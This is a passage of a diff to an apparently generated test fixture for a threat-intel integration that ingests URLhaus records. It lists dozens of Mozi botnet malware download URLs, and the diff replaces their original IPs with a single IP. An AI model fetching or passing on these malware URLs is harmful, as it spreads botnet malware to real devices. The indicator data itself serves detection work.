"http://58.255.142.90:36558/Mozi.a", + "original": "http://89.160.20.156:36558/Mozi.a", "scheme": "http", "port": 36558, - "domain": "58.255.142.90", - "full": "http://58.255.142.90:36558/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:36558/Mozi.a" }, - "ip": "58.255.142.90" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694353079Z", - "original": "{\"id\":\"961053\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961053/\",\"url\":\"http://58.255.142.90:36558/Mozi.a\",\"url_status\":\"online\",\"host\":\"58.255.142.90\",\"date_added\":\"2021-01-14 16:52:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028141600Z", + "original": "{\"id\":\"961053\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961053/\",\"url\":\"http://89.160.20.156:36558/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:52:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -24042,18 +24042,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://59.96.37.94:47548/Mozi.m", + "original": "http://89.160.20.156:47548/Mozi.m", "scheme": "http", "port": 47548, - "domain": "59.96.37.94", - "full": "http://59.96.37.94:47548/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:47548/Mozi.m" }, - "ip": "59.96.37.94" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694356836Z", - "original": "{\"id\":\"961050\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961050/\",\"url\":\"http://59.96.37.94:47548/Mozi.m\",\"url_status\":\"offline\",\"host\":\"59.96.37.94\",\"date_added\":\"2021-01-14 16:52:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028148500Z", + "original": "{\"id\":\"961050\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961050/\",\"url\":\"http://89.160.20.156:47548/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:52:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -24091,18 +24091,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://59.97.172.183:35796/Mozi.m", + "original": "http://89.160.20.156:35796/Mozi.m", "scheme": "http", "port": 35796, - "domain": "59.97.172.183", - "full": "http://59.97.172.183:35796/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:35796/Mozi.m" }, - "ip": "59.97.172.183" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694360453Z", - "original": "{\"id\":\"961051\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961051/\",\"url\":\"http://59.97.172.183:35796/Mozi.m\",\"url_status\":\"offline\",\"host\":\"59.97.172.183\",\"date_added\":\"2021-01-14 16:52:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028155300Z", + "original": "{\"id\":\"961051\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961051/\",\"url\":\"http://89.160.20.156:35796/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:52:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -24140,18 +24140,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://58.255.142.229:42765/Mozi.m", + "original": "http://89.160.20.156:42765/Mozi.m", "scheme": "http", "port": 42765, - "domain": "58.255.142.229", - "full": "http://58.255.142.229:42765/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:42765/Mozi.m" }, - "ip": "58.255.142.229" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694363949Z", - "original": "{\"id\":\"961052\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961052/\",\"url\":\"http://58.255.142.229:42765/Mozi.m\",\"url_status\":\"online\",\"host\":\"58.255.142.229\",\"date_added\":\"2021-01-14 16:52:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028162300Z", + "original": "{\"id\":\"961052\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961052/\",\"url\":\"http://89.160.20.156:42765/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:52:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -24189,18 +24189,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://189.51.106.169:37388/Mozi.a", + "original": "http://89.160.20.156:37388/Mozi.a", "scheme": "http", "port": 37388, - "domain": "189.51.106.169", - "full": "http://189.51.106.169:37388/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:37388/Mozi.a" }, - "ip": "189.51.106.169" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694367706Z", - "original": "{\"id\":\"961048\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961048/\",\"url\":\"http://189.51.106.169:37388/Mozi.a\",\"url_status\":\"offline\",\"host\":\"189.51.106.169\",\"date_added\":\"2021-01-14 16:51:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028169300Z", + "original": "{\"id\":\"961048\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961048/\",\"url\":\"http://89.160.20.156:37388/Mozi.a\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:51:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -24238,18 +24238,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://222.140.170.6:56849/Mozi.m", + "original": "http://89.160.20.156:56849/Mozi.m", "scheme": "http", "port": 56849, - "domain": "222.140.170.6", - "full": "http://222.140.170.6:56849/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:56849/Mozi.m" }, - "ip": "222.140.170.6" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694371383Z", - "original": "{\"id\":\"961049\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961049/\",\"url\":\"http://222.140.170.6:56849/Mozi.m\",\"url_status\":\"online\",\"host\":\"222.140.170.6\",\"date_added\":\"2021-01-14 16:51:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028176200Z", + "original": "{\"id\":\"961049\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961049/\",\"url\":\"http://89.160.20.156:56849/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:51:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -24287,18 +24287,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://186.33.123.64:35574/Mozi.m", + "original": "http://89.160.20.156:35574/Mozi.m", "scheme": "http", "port": 35574, - "domain": "186.33.123.64", - "full": "http://186.33.123.64:35574/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:35574/Mozi.m" }, - "ip": "186.33.123.64" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694374950Z", - "original": "{\"id\":\"961047\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961047/\",\"url\":\"http://186.33.123.64:35574/Mozi.m\",\"url_status\":\"online\",\"host\":\"186.33.123.64\",\"date_added\":\"2021-01-14 16:51:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028183300Z", + "original": "{\"id\":\"961047\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961047/\",\"url\":\"http://89.160.20.156:35574/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:51:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -24336,18 +24336,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://123.10.187.158:46947/Mozi.m", + "original": "http://89.160.20.156:46947/Mozi.m", "scheme": "http", "port": 46947, - "domain": "123.10.187.158", - "full": "http://123.10.187.158:46947/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:46947/Mozi.m" }, - "ip": "123.10.187.158" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694378396Z", - "original": "{\"id\":\"961046\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961046/\",\"url\":\"http://123.10.187.158:46947/Mozi.m\",\"url_status\":\"online\",\"host\":\"123.10.187.158\",\"date_added\":\"2021-01-14 16:50:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028190300Z", + "original": "{\"id\":\"961046\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961046/\",\"url\":\"http://89.160.20.156:46947/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:50:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -24385,18 +24385,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://117.192.226.243:34452/Mozi.m", + "original": "http://89.160.20.156:34452/Mozi.m", "scheme": "http", "port": 34452, - "domain": "117.192.226.243", - "full": "http://117.192.226.243:34452/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:34452/Mozi.m" }, - "ip": "117.192.226.243" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694381953Z", - "original": "{\"id\":\"961043\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961043/\",\"url\":\"http://117.192.226.243:34452/Mozi.m\",\"url_status\":\"offline\",\"host\":\"117.192.226.243\",\"date_added\":\"2021-01-14 16:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028197600Z", + "original": "{\"id\":\"961043\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961043/\",\"url\":\"http://89.160.20.156:34452/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -24434,18 +24434,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://119.123.223.174:33017/Mozi.m", + "original": "http://89.160.20.156:33017/Mozi.m", "scheme": "http", "port": 33017, - "domain": "119.123.223.174", - "full": "http://119.123.223.174:33017/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:33017/Mozi.m" }, - "ip": "119.123.223.174" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694385550Z", - "original": "{\"id\":\"961044\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961044/\",\"url\":\"http://119.123.223.174:33017/Mozi.m\",\"url_status\":\"offline\",\"host\":\"119.123.223.174\",\"date_added\":\"2021-01-14 16:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028205200Z", + "original": "{\"id\":\"961044\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961044/\",\"url\":\"http://89.160.20.156:33017/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -24483,18 +24483,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://115.58.133.223:55061/Mozi.m", + "original": "http://89.160.20.156:55061/Mozi.m", "scheme": "http", "port": 55061, - "domain": "115.58.133.223", - "full": "http://115.58.133.223:55061/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:55061/Mozi.m" }, - "ip": "115.58.133.223" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694389237Z", - "original": "{\"id\":\"961045\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961045/\",\"url\":\"http://115.58.133.223:55061/Mozi.m\",\"url_status\":\"online\",\"host\":\"115.58.133.223\",\"date_added\":\"2021-01-14 16:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028212200Z", + "original": "{\"id\":\"961045\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961045/\",\"url\":\"http://89.160.20.156:55061/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -24532,18 +24532,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://115.63.36.66:50046/Mozi.m", + "original": "http://89.160.20.156:50046/Mozi.m", "scheme": "http", "port": 50046, - "domain": "115.63.36.66", - "full": "http://115.63.36.66:50046/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:50046/Mozi.m" }, - "ip": "115.63.36.66" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694392853Z", - "original": "{\"id\":\"961040\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961040/\",\"url\":\"http://115.63.36.66:50046/Mozi.m\",\"url_status\":\"online\",\"host\":\"115.63.36.66\",\"date_added\":\"2021-01-14 16:50:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028219100Z", + "original": "{\"id\":\"961040\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961040/\",\"url\":\"http://89.160.20.156:50046/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:50:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -24581,18 +24581,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://115.56.133.53:51960/Mozi.a", + "original": "http://89.160.20.156:51960/Mozi.a", "scheme": "http", "port": 51960, - "domain": "115.56.133.53", - "full": "http://115.56.133.53:51960/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:51960/Mozi.a" }, - "ip": "115.56.133.53" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694396871Z", - "original": "{\"id\":\"961041\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961041/\",\"url\":\"http://115.56.133.53:51960/Mozi.a\",\"url_status\":\"online\",\"host\":\"115.56.133.53\",\"date_added\":\"2021-01-14 16:50:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028225900Z", + "original": "{\"id\":\"961041\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961041/\",\"url\":\"http://89.160.20.156:51960/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:50:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -24630,18 +24630,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://117.247.203.62:42372/Mozi.m", + "original": "http://89.160.20.156:42372/Mozi.m", "scheme": "http", "port": 42372, - "domain": "117.247.203.62", - "full": "http://117.247.203.62:42372/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:42372/Mozi.m" }, - "ip": "117.247.203.62" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694400468Z", - "original": "{\"id\":\"961042\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961042/\",\"url\":\"http://117.247.203.62:42372/Mozi.m\",\"url_status\":\"offline\",\"host\":\"117.247.203.62\",\"date_added\":\"2021-01-14 16:50:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028233Z", + "original": "{\"id\":\"961042\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961042/\",\"url\":\"http://89.160.20.156:42372/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:50:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -24679,18 +24679,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://113.88.211.251:51592/Mozi.m", + "original": "http://89.160.20.156:51592/Mozi.m", "scheme": "http", "port": 51592, - "domain": "113.88.211.251", - "full": "http://113.88.211.251:51592/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:51592/Mozi.m" }, - "ip": "113.88.211.251" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694404806Z", - "original": "{\"id\":\"961039\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961039/\",\"url\":\"http://113.88.211.251:51592/Mozi.m\",\"url_status\":\"offline\",\"host\":\"113.88.211.251\",\"date_added\":\"2021-01-14 16:49:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028239800Z", + "original": "{\"id\":\"961039\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961039/\",\"url\":\"http://89.160.20.156:51592/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:49:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -24728,18 +24728,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://103.146.233.126:35585/Mozi.a", + "original": "http://89.160.20.156:35585/Mozi.a", "scheme": "http", "port": 35585, - "domain": "103.146.233.126", - "full": "http://103.146.233.126:35585/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:35585/Mozi.a" }, - "ip": "103.146.233.126" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694408493Z", - "original": "{\"id\":\"961038\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961038/\",\"url\":\"http://103.146.233.126:35585/Mozi.a\",\"url_status\":\"offline\",\"host\":\"103.146.233.126\",\"date_added\":\"2021-01-14 16:49:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028246700Z", + "original": "{\"id\":\"961038\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961038/\",\"url\":\"http://89.160.20.156:35585/Mozi.a\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:49:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -24777,18 +24777,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://115.51.91.178:38398/Mozi.m", + "original": "http://89.160.20.156:38398/Mozi.m", "scheme": "http", "port": 38398, - "domain": "115.51.91.178", - "full": "http://115.51.91.178:38398/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:38398/Mozi.m" }, - "ip": "115.51.91.178" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694412500Z", - "original": "{\"id\":\"961035\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961035/\",\"url\":\"http://115.51.91.178:38398/Mozi.m\",\"url_status\":\"online\",\"host\":\"115.51.91.178\",\"date_added\":\"2021-01-14 16:49:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028255700Z", + "original": "{\"id\":\"961035\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961035/\",\"url\":\"http://89.160.20.156:38398/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:49:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -24826,18 +24826,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://115.55.60.104:59880/Mozi.m", + "original": "http://89.160.20.156:59880/Mozi.m", "scheme": "http", "port": 59880, - "domain": "115.55.60.104", - "full": "http://115.55.60.104:59880/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:59880/Mozi.m" }, - "ip": "115.55.60.104" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694416217Z", - "original": "{\"id\":\"961036\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961036/\",\"url\":\"http://115.55.60.104:59880/Mozi.m\",\"url_status\":\"online\",\"host\":\"115.55.60.104\",\"date_added\":\"2021-01-14 16:49:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028263300Z", + "original": "{\"id\":\"961036\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961036/\",\"url\":\"http://89.160.20.156:59880/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:49:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -24875,18 +24875,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://113.92.158.127:39138/Mozi.a", + "original": "http://89.160.20.156:39138/Mozi.a", "scheme": "http", "port": 39138, - "domain": "113.92.158.127", - "full": "http://113.92.158.127:39138/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:39138/Mozi.a" }, - "ip": "113.92.158.127" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694419724Z", - "original": "{\"id\":\"961037\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961037/\",\"url\":\"http://113.92.158.127:39138/Mozi.a\",\"url_status\":\"online\",\"host\":\"113.92.158.127\",\"date_added\":\"2021-01-14 16:49:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028270200Z", + "original": "{\"id\":\"961037\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961037/\",\"url\":\"http://89.160.20.156:39138/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:49:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not 